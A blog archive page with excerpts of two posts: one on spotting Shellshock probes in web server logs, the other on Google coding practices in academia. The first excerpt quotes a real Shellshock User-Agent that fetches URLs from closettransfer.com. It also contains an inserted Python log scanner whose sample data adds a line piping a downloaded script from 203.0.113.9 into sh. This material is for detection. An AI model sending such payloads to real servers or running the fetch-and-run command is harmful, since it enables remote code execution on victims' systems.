Posts

Showing posts from April, 2016

Indirect shellshock security scanning via other people's logfiles

One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Seasonally-appropriate designer labels.  Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised and I should try to notify them? Hmm.  What the heck - try to download the page:

 --2016-04-30 13:38:26--  http://closettransfer.com/IPTRANSITTEST
Resolving closettransfer.com (closettrans…
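The user-agent quoted above is the classic Shellshock (CVE-2014-6271 family) trigger: an exported-function definition `() { :; };` followed by commands that a vulnerable bash will run when the header is passed through as a CGI environment variable. The scanner below is an added example, not code from the original post; it parses Apache/nginx "combined" log lines, flags any request line, Referer or User-Agent that carries that pattern, and pulls out the URLs the trailing commands try to fetch, which is exactly the kind of indicator (here, closettransfer.com) the post goes on to investigate. The sample log lines other than the one quoted on the page are constructed for the example, with RFC 5737 test addresses.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Apache/nginx "combined" format:
#   ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# Shellshock trigger: a function definition "() { ... }" followed by ";" and
# then arbitrary commands.  Tolerates the spacing variants seen in the wild
# ("() { :; };", "() { :;};", "() {:;};").
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# URLs the trailing commands try to fetch (wget/curl/fetch targets): the IOCs.
URL_RE = re.compile(r"https?://[^\s'\"();]+")


@dataclass
class Hit:
    ip: str
    time: str
    where: str        # which log field carried the payload
    payload: str      # the commands after the function definition
    urls: list = field(default_factory=list)


def extract_urls(text):
    """Unique URLs in first-seen order."""
    seen = []
    for u in URL_RE.findall(text):
        if u not in seen:
            seen.append(u)
    return seen


def scan_line(line):
    """Return a Hit if this combined-log line carries a shellshock-style payload, else None."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None
    # Any header a CGI script exports into the environment is a candidate:
    # User-Agent and Referer are the common carriers, but check the request line too.
    for name in ("agent", "referer", "request"):
        value = m.group(name)
        s = SHELLSHOCK_RE.search(value)
        if s:
            payload = value[s.end():].strip()
            return Hit(m.group("ip"), m.group("time"), name, payload, extract_urls(payload))
    return None


def scan_log(lines):
    return [h for h in (scan_line(l) for l in lines) if h]


def ioc_hosts(hits):
    """Sorted unique hostnames contacted by the payloads, for blocklists or lookups."""
    return sorted({urlparse(u).hostname for h in hits for u in h.urls})


# Constructed sample log: line 1 is the entry quoted in the post, the others are made up.
SAMPLE_LOG = [
    '24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" '
    '"() { :; }; /bin/sh -c \'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;'
    'wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;'
    'curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;'
    '/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;'
    'fetch -/dev/null http://closettransfer.com/IPTRANSITTEST\'"',
    '203.0.113.5 - - [28/Apr/2016:17:01:02 -0500] "GET /index.html HTTP/1.1" 200 1234 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0"',
    '198.51.100.7 - - [28/Apr/2016:17:03:11 -0500] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"() { :;}; /bin/bash -c \'curl http://203.0.113.9/x.sh | sh\'" "curl/7.47.0"',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h.ip} {h.time} via {h.where}: {h.payload[:60]}... urls={h.urls}")
    print("IOC hosts:", ioc_hosts(hits))
```

Run it against a real access log with `scan_log(open("access.log"))`; a 403 or 404 status on a hit, as in the quoted line, only tells you the request was refused, not that the probe failed elsewhere, so the fetched URLs are still worth treating as indicators.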

Stealing Google's Coding Practices for Academia

I'm spending the year in Google's Visiting Faculty program.  I had a few goals for my experience here:

1. Learn learn learn!  I hoped to get a different perspective from the inside of the largest collection of computing & distributed systems that the world has ever seen, and to learn enough about machine learning to think better about providing systems support for it.  I haven't been disappointed.
2. Do some real engineering.  I spend most of my time as a faculty member teaching & mentoring my Ph.D. students in research.  I love this - it's terribly fun and working with fantastic students is an incredibly rewarding experience.  But I also get a lot of creative satisfaction from coding, and I can only carve out a bit of my faculty time to dedicate to it.  I haven't written large amounts of production code since I was 21 - and the world has changed a lot since then.
3. Contribute something useful to Google while I was here.  They're paying my salary for the time I…